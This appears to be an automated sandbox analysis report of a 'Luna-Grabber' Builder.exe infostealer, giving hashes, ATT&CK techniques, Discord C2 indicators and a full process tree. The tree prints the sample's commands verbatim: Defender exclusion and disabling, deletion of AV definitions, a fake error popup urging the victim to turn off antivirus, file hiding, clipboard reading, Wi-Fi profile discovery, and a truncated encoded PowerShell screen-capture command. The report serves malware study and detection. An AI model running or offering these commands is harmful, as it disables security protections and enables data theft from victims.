e1a5ef2777acf33ec21f7dc25bb4b1beec3b6f12752385b1d6d07d8ae917c078

Analysis

max time kernel
152s
max time network
288s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
04-12-2024 09:37

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Luna-Grabber-main/Builder.exe
Size

7.3MB
MD5

a215edd9d9788492b561858e44184bca
SHA1

77d8816ecce79f525c118687149e2f3b68dcb984
SHA256

7fbbefdae9adf0f81808b9decf48c08ba4a47293e80cd4855c083ab1f392c184
SHA512

64dfdf28e74a95af3cef3ad89b45d656bb49fba705665aad7878a397f18ae1c1a7e1aca2df466e80179f130b5350f0ac1eea26affe940742c2c42b8930f035ff
SSDEEP

196608:uuWYS6uOshoKMuIkhVastRL5Di3uq1D7mW:IYShOshouIkPftRL54DRX

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3856	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2080	powershell.exe
4628	powershell.exe
3348	powershell.exe
3440	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Builder.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1964	cmd.exe
232	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3372	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe
1792	Builder.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	discord.com
25	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
22	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2980	tasklist.exe
4504	tasklist.exe
2012	tasklist.exe
1312	tasklist.exe
2396	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3700	cmd.exe

UPX packed file 62 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00280000000450ec-21.dat	upx
behavioral2/memory/1792-25-0x00007FF9C1920000-0x00007FF9C1F09000-memory.dmp	upx
behavioral2/files/0x00280000000450df-27.dat	upx
behavioral2/files/0x00280000000450ea-29.dat	upx
behavioral2/files/0x00280000000450e6-47.dat	upx
behavioral2/files/0x00280000000450e5-46.dat	upx
behavioral2/files/0x00280000000450e4-45.dat	upx
behavioral2/files/0x00280000000450e3-44.dat	upx
behavioral2/files/0x00280000000450e2-43.dat	upx
behavioral2/files/0x00280000000450e1-42.dat	upx
behavioral2/files/0x00280000000450e0-41.dat	upx
behavioral2/files/0x00280000000450de-40.dat	upx
behavioral2/files/0x00280000000450f1-39.dat	upx
behavioral2/files/0x00280000000450f0-38.dat	upx
behavioral2/files/0x00280000000450ef-37.dat	upx
behavioral2/files/0x00280000000450eb-34.dat	upx
behavioral2/files/0x00280000000450e9-33.dat	upx
behavioral2/memory/1792-30-0x00007FF9D1670000-0x00007FF9D1693000-memory.dmp	upx
behavioral2/memory/1792-48-0x00007FF9DA480000-0x00007FF9DA48F000-memory.dmp	upx
behavioral2/memory/1792-54-0x00007FF9D0EF0000-0x00007FF9D0F1D000-memory.dmp	upx
behavioral2/memory/1792-56-0x00007FF9D1070000-0x00007FF9D1089000-memory.dmp	upx
behavioral2/memory/1792-58-0x00007FF9D0C60000-0x00007FF9D0C83000-memory.dmp	upx
behavioral2/memory/1792-60-0x00007FF9CCC80000-0x00007FF9CCDF7000-memory.dmp	upx
behavioral2/memory/1792-64-0x00007FF9D2C80000-0x00007FF9D2C8D000-memory.dmp	upx
behavioral2/memory/1792-63-0x00007FF9CE840000-0x00007FF9CE859000-memory.dmp	upx
behavioral2/memory/1792-66-0x00007FF9D0E10000-0x00007FF9D0E43000-memory.dmp	upx
behavioral2/memory/1792-70-0x00007FF9D0530000-0x00007FF9D05FD000-memory.dmp	upx
behavioral2/memory/1792-69-0x00007FF9C1920000-0x00007FF9C1F09000-memory.dmp	upx
behavioral2/memory/1792-72-0x00007FF9D1670000-0x00007FF9D1693000-memory.dmp	upx
behavioral2/memory/1792-71-0x00007FF9C0E30000-0x00007FF9C1350000-memory.dmp	upx
behavioral2/memory/1792-76-0x00007FF9D0E00000-0x00007FF9D0E0D000-memory.dmp	upx
behavioral2/memory/1792-74-0x00007FF9D7DC0000-0x00007FF9D7DD4000-memory.dmp	upx
behavioral2/memory/1792-79-0x00007FF9D0410000-0x00007FF9D052C000-memory.dmp	upx
behavioral2/memory/1792-78-0x00007FF9D1070000-0x00007FF9D1089000-memory.dmp	upx
behavioral2/memory/1792-81-0x00007FF9CCC80000-0x00007FF9CCDF7000-memory.dmp	upx
behavioral2/memory/1792-80-0x00007FF9D0C60000-0x00007FF9D0C83000-memory.dmp	upx
behavioral2/memory/1792-94-0x00007FF9CE840000-0x00007FF9CE859000-memory.dmp	upx
behavioral2/memory/1792-106-0x00007FF9D2C80000-0x00007FF9D2C8D000-memory.dmp	upx
behavioral2/memory/1792-113-0x00007FF9D0E10000-0x00007FF9D0E43000-memory.dmp	upx
behavioral2/memory/1792-114-0x00007FF9C0E30000-0x00007FF9C1350000-memory.dmp	upx
behavioral2/memory/1792-159-0x00007FF9D0530000-0x00007FF9D05FD000-memory.dmp	upx
behavioral2/memory/1792-276-0x00007FF9D1670000-0x00007FF9D1693000-memory.dmp	upx
behavioral2/memory/1792-286-0x00007FF9C0E30000-0x00007FF9C1350000-memory.dmp	upx
behavioral2/memory/1792-285-0x00007FF9D0530000-0x00007FF9D05FD000-memory.dmp	upx
behavioral2/memory/1792-284-0x00007FF9D0E10000-0x00007FF9D0E43000-memory.dmp	upx
behavioral2/memory/1792-281-0x00007FF9CCC80000-0x00007FF9CCDF7000-memory.dmp	upx
behavioral2/memory/1792-275-0x00007FF9C1920000-0x00007FF9C1F09000-memory.dmp	upx
behavioral2/memory/1792-325-0x00007FF9C1920000-0x00007FF9C1F09000-memory.dmp	upx
behavioral2/memory/1792-334-0x00007FF9D0E10000-0x00007FF9D0E43000-memory.dmp	upx
behavioral2/memory/1792-333-0x00007FF9CCC80000-0x00007FF9CCDF7000-memory.dmp	upx
behavioral2/memory/1792-332-0x00007FF9CE840000-0x00007FF9CE859000-memory.dmp	upx
behavioral2/memory/1792-331-0x00007FF9D2C80000-0x00007FF9D2C8D000-memory.dmp	upx
behavioral2/memory/1792-330-0x00007FF9D0C60000-0x00007FF9D0C83000-memory.dmp	upx
behavioral2/memory/1792-329-0x00007FF9D1070000-0x00007FF9D1089000-memory.dmp	upx
behavioral2/memory/1792-328-0x00007FF9D0EF0000-0x00007FF9D0F1D000-memory.dmp	upx
behavioral2/memory/1792-327-0x00007FF9DA480000-0x00007FF9DA48F000-memory.dmp	upx
behavioral2/memory/1792-326-0x00007FF9D1670000-0x00007FF9D1693000-memory.dmp	upx
behavioral2/memory/1792-324-0x00007FF9D0410000-0x00007FF9D052C000-memory.dmp	upx
behavioral2/memory/1792-323-0x00007FF9D0E00000-0x00007FF9D0E0D000-memory.dmp	upx
behavioral2/memory/1792-322-0x00007FF9D7DC0000-0x00007FF9D7DD4000-memory.dmp	upx
behavioral2/memory/1792-321-0x00007FF9C0E30000-0x00007FF9C1350000-memory.dmp	upx
behavioral2/memory/1792-320-0x00007FF9D0530000-0x00007FF9D05FD000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1884	PING.EXE
976	cmd.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2292	cmd.exe
1624	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2544	WMIC.exe
448	WMIC.exe
4448	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4524	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1884	PING.EXE

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
2080	powershell.exe
1992	WMIC.exe
1992	WMIC.exe
1992	WMIC.exe
1992	WMIC.exe
3440	powershell.exe
2080	powershell.exe
3440	powershell.exe
2544	WMIC.exe
2544	WMIC.exe
2544	WMIC.exe
2544	WMIC.exe
448	WMIC.exe
448	WMIC.exe
448	WMIC.exe
448	WMIC.exe
2920	WMIC.exe
2920	WMIC.exe
2920	WMIC.exe
2920	WMIC.exe
232	powershell.exe
232	powershell.exe
232	powershell.exe
388	powershell.exe
388	powershell.exe
388	powershell.exe
4628	powershell.exe
4628	powershell.exe
448	powershell.exe
448	powershell.exe
1780	WMIC.exe
1780	WMIC.exe
1780	WMIC.exe
1780	WMIC.exe
2764	WMIC.exe
2764	WMIC.exe
2764	WMIC.exe
2764	WMIC.exe
2036	WMIC.exe
2036	WMIC.exe
2036	WMIC.exe
2036	WMIC.exe
3348	powershell.exe
3348	powershell.exe
4448	WMIC.exe
4448	WMIC.exe
4448	WMIC.exe
4448	WMIC.exe
2260	powershell.exe
2260	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeIncreaseQuotaPrivilege	1992	WMIC.exe
Token: SeSecurityPrivilege	1992	WMIC.exe
Token: SeTakeOwnershipPrivilege	1992	WMIC.exe
Token: SeLoadDriverPrivilege	1992	WMIC.exe
Token: SeSystemProfilePrivilege	1992	WMIC.exe
Token: SeSystemtimePrivilege	1992	WMIC.exe
Token: SeProfSingleProcessPrivilege	1992	WMIC.exe
Token: SeIncBasePriorityPrivilege	1992	WMIC.exe
Token: SeCreatePagefilePrivilege	1992	WMIC.exe
Token: SeBackupPrivilege	1992	WMIC.exe
Token: SeRestorePrivilege	1992	WMIC.exe
Token: SeShutdownPrivilege	1992	WMIC.exe
Token: SeDebugPrivilege	1992	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1992	WMIC.exe
Token: SeRemoteShutdownPrivilege	1992	WMIC.exe
Token: SeUndockPrivilege	1992	WMIC.exe
Token: SeManageVolumePrivilege	1992	WMIC.exe
Token: 33	1992	WMIC.exe
Token: 34	1992	WMIC.exe
Token: 35	1992	WMIC.exe
Token: 36	1992	WMIC.exe
Token: SeDebugPrivilege	2012	tasklist.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeIncreaseQuotaPrivilege	1992	WMIC.exe
Token: SeSecurityPrivilege	1992	WMIC.exe
Token: SeTakeOwnershipPrivilege	1992	WMIC.exe
Token: SeLoadDriverPrivilege	1992	WMIC.exe
Token: SeSystemProfilePrivilege	1992	WMIC.exe
Token: SeSystemtimePrivilege	1992	WMIC.exe
Token: SeProfSingleProcessPrivilege	1992	WMIC.exe
Token: SeIncBasePriorityPrivilege	1992	WMIC.exe
Token: SeCreatePagefilePrivilege	1992	WMIC.exe
Token: SeBackupPrivilege	1992	WMIC.exe
Token: SeRestorePrivilege	1992	WMIC.exe
Token: SeShutdownPrivilege	1992	WMIC.exe
Token: SeDebugPrivilege	1992	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1992	WMIC.exe
Token: SeRemoteShutdownPrivilege	1992	WMIC.exe
Token: SeUndockPrivilege	1992	WMIC.exe
Token: SeManageVolumePrivilege	1992	WMIC.exe
Token: 33	1992	WMIC.exe
Token: 34	1992	WMIC.exe
Token: 35	1992	WMIC.exe
Token: 36	1992	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3440	powershell.exe
Token: SeSecurityPrivilege	3440	powershell.exe
Token: SeTakeOwnershipPrivilege	3440	powershell.exe
Token: SeLoadDriverPrivilege	3440	powershell.exe
Token: SeSystemProfilePrivilege	3440	powershell.exe
Token: SeSystemtimePrivilege	3440	powershell.exe
Token: SeProfSingleProcessPrivilege	3440	powershell.exe
Token: SeIncBasePriorityPrivilege	3440	powershell.exe
Token: SeCreatePagefilePrivilege	3440	powershell.exe
Token: SeBackupPrivilege	3440	powershell.exe
Token: SeRestorePrivilege	3440	powershell.exe
Token: SeShutdownPrivilege	3440	powershell.exe
Token: SeDebugPrivilege	3440	powershell.exe
Token: SeSystemEnvironmentPrivilege	3440	powershell.exe
Token: SeRemoteShutdownPrivilege	3440	powershell.exe
Token: SeUndockPrivilege	3440	powershell.exe
Token: SeManageVolumePrivilege	3440	powershell.exe
Token: 33	3440	powershell.exe
Token: 34	3440	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3460 wrote to memory of 1792	3460	Builder.exe	80
PID 3460 wrote to memory of 1792	3460	Builder.exe	80
PID 1792 wrote to memory of 2896	1792	Builder.exe	81
PID 1792 wrote to memory of 2896	1792	Builder.exe	81
PID 1792 wrote to memory of 3496	1792	Builder.exe	82
PID 1792 wrote to memory of 3496	1792	Builder.exe	82
PID 1792 wrote to memory of 3956	1792	Builder.exe	83
PID 1792 wrote to memory of 3956	1792	Builder.exe	83
PID 1792 wrote to memory of 1672	1792	Builder.exe	86
PID 1792 wrote to memory of 1672	1792	Builder.exe	86
PID 1792 wrote to memory of 4844	1792	Builder.exe	89
PID 1792 wrote to memory of 4844	1792	Builder.exe	89
PID 3496 wrote to memory of 2080	3496	cmd.exe	91
PID 3496 wrote to memory of 2080	3496	cmd.exe	91
PID 1672 wrote to memory of 2012	1672	cmd.exe	92
PID 1672 wrote to memory of 2012	1672	cmd.exe	92
PID 4844 wrote to memory of 1992	4844	cmd.exe	93
PID 4844 wrote to memory of 1992	4844	cmd.exe	93
PID 3956 wrote to memory of 4224	3956	cmd.exe	94
PID 3956 wrote to memory of 4224	3956	cmd.exe	94
PID 2896 wrote to memory of 3440	2896	cmd.exe	95
PID 2896 wrote to memory of 3440	2896	cmd.exe	95
PID 1792 wrote to memory of 5052	1792	Builder.exe	97
PID 1792 wrote to memory of 5052	1792	Builder.exe	97
PID 5052 wrote to memory of 3224	5052	cmd.exe	99
PID 5052 wrote to memory of 3224	5052	cmd.exe	99
PID 1792 wrote to memory of 2764	1792	Builder.exe	101
PID 1792 wrote to memory of 2764	1792	Builder.exe	101
PID 2764 wrote to memory of 3372	2764	cmd.exe	103
PID 2764 wrote to memory of 3372	2764	cmd.exe	103
PID 1792 wrote to memory of 752	1792	Builder.exe	104
PID 1792 wrote to memory of 752	1792	Builder.exe	104
PID 752 wrote to memory of 2544	752	cmd.exe	145
PID 752 wrote to memory of 2544	752	cmd.exe	145
PID 1792 wrote to memory of 4756	1792	Builder.exe	107
PID 1792 wrote to memory of 4756	1792	Builder.exe	107
PID 4756 wrote to memory of 448	4756	cmd.exe	175
PID 4756 wrote to memory of 448	4756	cmd.exe	175
PID 3496 wrote to memory of 3856	3496	cmd.exe	110
PID 3496 wrote to memory of 3856	3496	cmd.exe	110
PID 1792 wrote to memory of 3700	1792	Builder.exe	111
PID 1792 wrote to memory of 3700	1792	Builder.exe	111
PID 3700 wrote to memory of 4368	3700	cmd.exe	113
PID 3700 wrote to memory of 4368	3700	cmd.exe	113
PID 1792 wrote to memory of 2568	1792	Builder.exe	114
PID 1792 wrote to memory of 2568	1792	Builder.exe	114
PID 1792 wrote to memory of 568	1792	Builder.exe	115
PID 1792 wrote to memory of 568	1792	Builder.exe	115
PID 1792 wrote to memory of 1632	1792	Builder.exe	118
PID 1792 wrote to memory of 1632	1792	Builder.exe	118
PID 568 wrote to memory of 1312	568	cmd.exe	120
PID 568 wrote to memory of 1312	568	cmd.exe	120
PID 2568 wrote to memory of 2396	2568	cmd.exe	121
PID 2568 wrote to memory of 2396	2568	cmd.exe	121
PID 1792 wrote to memory of 1964	1792	Builder.exe	122
PID 1792 wrote to memory of 1964	1792	Builder.exe	122
PID 1792 wrote to memory of 3424	1792	Builder.exe	124
PID 1792 wrote to memory of 3424	1792	Builder.exe	124
PID 1792 wrote to memory of 1044	1792	Builder.exe	126
PID 1792 wrote to memory of 1044	1792	Builder.exe	126
PID 1632 wrote to memory of 2920	1632	cmd.exe	127
PID 1632 wrote to memory of 2920	1632	cmd.exe	127
PID 1792 wrote to memory of 2292	1792	Builder.exe	129
PID 1792 wrote to memory of 2292	1792	Builder.exe	129

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4368	attrib.exe
2392	attrib.exe
816	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3460
- C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe
  "C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2896
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3496
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2080
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3956
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Failed to open Builder.exe! Please turn off your Anti-Virus. If you think this is a mistake please contact DexterWasHere#2952 on Discord', 0, 'Error02', 0+16);close()"
      4⤵
      PID:4224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1672
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5052
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:3224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2764
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:3372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:2544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3700
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Luna-Grabber-main\Builder.exe"
      4⤵
      Views/modifies file attributes
      PID:4368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2568
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2396
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:568
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1632
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:1964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:3424
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2980
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1044
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2292
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4944
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1628
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBC